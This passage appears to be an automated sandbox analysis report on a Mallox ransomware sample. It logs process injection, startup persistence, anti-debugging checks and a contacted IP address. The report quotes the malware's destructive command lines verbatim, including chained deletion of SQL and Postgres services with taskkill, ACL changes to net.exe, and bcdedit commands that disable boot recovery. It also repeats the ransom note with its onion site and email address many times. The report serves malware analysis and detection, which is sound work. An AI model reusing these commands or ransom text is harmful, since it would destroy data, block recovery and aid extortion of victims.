Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: vssadmin.exe process_identifier: 2920	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: cmd.exe process_identifier: 2940	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: cmd.exe process_identifier: 2948	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: conhost.exe process_identifier: 3048	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: conhost.exe process_identifier: 2220	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: conhost.exe process_identifier: 2240	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: cmd.exe process_identifier: 948	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: cmd.exe process_identifier: 524	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 27, 2023, 11:43 a.m.	flags: 1158 family: 0	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 27, 2023, 11:43 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 11:43 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 11:43 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 11:43 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 11:43 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 11:44 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 11:44 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://www.torproject.org/download/

Yara rule detected in process memory (13 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (22 events)

cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
cmdline	takeown /f C:\Windows\SysWOW64\net.exe /a
cmdline	cacls C:\Windows\system32\net.exe /e /d system
cmdline	cacls C:\Windows\system32\net.exe /e /d mssqlserver
cmdline	cacls C:\Windows\system32\net.exe /e /d "network service"
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
cmdline	sc delete "MSSQLFDLauncher"
cmdline	cacls C:\Windows\system32\net.exe /e /g Users:r
cmdline	cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
cmdline	takeown /f C:\Windows\system32\net.exe /a
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
cmdline	cacls C:\Windows\system32\net.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
cmdline	cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	cacls C:\Windows\system32\net.exe /e /d SERVICE
cmdline	reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
cmdline	"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	cacls C:\Windows\system32\net.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d system

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 756847f2cd284fbf7fed76babd9e4f7a52e72dd7

Communicates with host for which no DNS query was performed (1 event)

host

80.66.75.37

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 2680 region_size: 176128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0	0

Attempts to identify installed AV products by installation directory (6 events)

file	C:\Users\All Users\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt
file	C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt
file	C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt
file	C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt
file	C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt
file	C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 27, 2023, 11:43 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

Zqbpytwp.exe tried to sleep 2728293 seconds, actually delayed analysis time by 2728293 seconds

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Hvrodssun

reg_value

C:\Users\test22\AppData\Roaming\Hvrodssun.exe

Creates known Dyreza Banking Trojan files, registry keys and/or mutexes (1 event)

file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CP_Common\FILE RECOVERY.txt

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄMa±&vaÄMt`±&vaRich°&vaPELYOdà\|ü§@°@ÈàÌ@8x@Ð.textôz\| `.rdata\@@.dataPK0@À.rsrcà&@@.relocÌ(@B base_address: 0x00400000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: 0 H`}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00428000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2680 process_handle: 0x00000520	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄMa±&vaÄMt`±&vaRich°&vaPELYOdà\|ü§@°@ÈàÌ@8x@Ð.textôz\| `.rdata\@@.dataPK0@À.rsrcà&@@.relocÌ(@B base_address: 0x00400000 process_identifier: 2680 process_handle: 0x00000520	1	1	0

Modifies boot configuration settings (2 events)

command	"c:\windows\system32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
command	"c:\windows\system32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1440 called NtSetContextThread to modify thread in remote process 2680
NtSetContextThread July 27, 2023, 11:43 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4232103 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000051c process_identifier: 2680	1	0	0

url	https://www.torproject.org/download/

Writes a potential ransom message to disk (50 out of 2781 events)

Time & API	Arguments	Status
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: \Device\HarddiskVolume1\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000038c filepath: C:\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: \Device\HarddiskVolume1\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002d8 filepath: C:\$Recycle.Bin\S-1-5-21-3832866432-4053218753-3017428901-1001\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\$Recycle.Bin\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000041c filepath: C:\Config.Msi\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\ko-KR\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\ko-KR_en-US\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000160 filepath: C:\ProgramData\Microsoft\Assistance\Client\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\ProgramData\Microsoft\Assistance\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Crypto\DSS\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Crypto\Keys\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\FILE RECOVERY.txt	1
